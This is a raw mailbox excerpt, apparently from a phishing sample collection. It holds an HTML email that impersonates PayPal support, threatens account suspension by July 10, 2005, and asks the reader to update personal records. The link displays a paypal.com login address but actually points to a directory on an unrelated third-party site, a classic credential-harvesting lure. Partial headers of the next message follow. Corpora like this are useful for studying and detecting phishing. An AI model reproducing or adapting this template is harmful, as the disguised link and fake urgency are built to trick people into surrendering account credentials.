From: "support@paypal.com" <support@paypal.com>
Reply-To: support@paypal.com
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Status: O
X-Status: 
X-Keywords:                  
X-UID: 73

<A href="http://www.paypal.com/cgi-bin/webscr?cmd=_home"><IMG src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" border=0></A>&nbsp; 
<TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
<TBODY>
<TR>
<TD colSpan=3><IMG height=2 src="pp.files/pixel.gif" width=2></TD></TR></TBODY></TABLE>
<P><FONT size=2><FONT face=Verdana>Dear valued&nbsp;<STRONG><STRONG><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">PayPal</SPAN></STRONG>&nbsp;</STRONG>member</FONT>:&nbsp;<BR>
</FONT><BR></P>
<P><FONT face=Verdana size=2>It has come to our attention that your&nbsp;<SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal</STRONG></SPAN> account information needs to be&nbsp;<BR>
    updated as part of our continuing commitment to protect your account and to&nbsp;<BR>reduce the instance of fraud on our website.&nbsp;</FONT><FONT face=Verdana size=2><FONT face=Verdana size=2> If you could please take 5-10 minutes&nbsp;<BR>out of your </FONT><FONT face=Verdana size=2>online </FONT><FONT face=Verdana size=2>experience and update your personal records you will not run into&nbsp;<BR>any future </FONT><FONT face=Verdana size=2>problems with the online service.&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</FONT></P>
<P><FONT face=Verdana size=2>However, failure to update your records will result in account suspension.&nbsp;<BR>
Please update your records&nbsp;on or before&nbsp;<FONT color=red><STRONG>July 10, 2005</STRONG>.</FONT>&nbsp;<BR>
<BR>Once you have updated your account records, your&nbsp;<SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal</STRONG></SPAN> session will not be&nbsp;<BR>
interrupted and will continue as normal. </FONT></P>
<P><FONT face=Verdana size=2>To update your <SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal</STRONG></SPAN> records click on the following link:&nbsp;<BR>
</FONT><A href="http://www.ctcanadatravel.ca/~blake/.paypal/" target=_blank><FONT face=Verdana size=2>http://www.paypal.com/cgi-bin/webscr?cmd=_login-run</FONT></A></P>
<P><FONT face=Verdana size=2></FONT>&nbsp;</P>
<P><FONT face=Verdana size=2>Thank You. &nbsp;<BR><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal<SUP> </SUP><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">UPDATE </SPAN></STRONG><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>TEAM</STRONG></SPAN></SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </P>
<P><FONT face=Verdana size=2>Accounts Management As outlined in our User Agreement, <SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal</STRONG></SPAN> will&nbsp;<BR>
periodically send you information about site changes and enhancements. </FONT></P>
<P><FONT face=Verdana size=2>Visit our Privacy Policy </FONT><FONT face=Verdana size=2>and User Agreement if you have any questions.&nbsp;<BR></FONT><A href="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside"><FONT face=Verdana size=2>http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside</FONT></A></P>
<P>&nbsp;</P></FORM></FONT></FONT></BODY></HTML>



From jeremy@angelar.com  Tue Jun 28 14:05:44 2005
Return-Path: <jeremy@angelar.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id C2DBE536EBC
	for <jose@login.monkey.org>; Tue, 28 Jun 2005 14:05:44 -0400 (EDT)
Received: from ms-smtp-01.rdc-kc.rr.com (ms-smtp-01.rdc-kc.rr.com [24.94.166.115])
	by mail1.monkey.org (Postfix) with ESMTP id D205185AF75
	for <jose@monkey.org>; Tue, 28 Jun 2005 14:05:43 -0400 (EDT)
Received: from angelar.com (CPE-24-163-222-21.mn.res.rr.com [24.163.222.21])
	by ms-smtp-01.rdc-kc.rr.com (8.12.10/8.12.7) with ESMTP id j5SI5eZ7006065
	for <jose@monkey.org>; Tue, 28 Jun 2005 13:05:41 -0500 (CDT)
Received: from mail.angelar.com (eva [127.0.0.1])
	by angelar.com (8.13.1/8.13.1) with ESMTP id j5SI5a5e018577
	for <jose@monkey.org>; Tue, 28 Jun 2005 13:05:38 -0500
Received: (from jeremy@localhost)
	by mail.angelar.com (8.13.1/8.13.1/Submit) id j5SI5Zgq018576
	for jose@monkey.org; Tue, 28 Jun 2005 13:05:35 -0500
Date: Tue, 28 Jun 2005 13:05:35 -0500
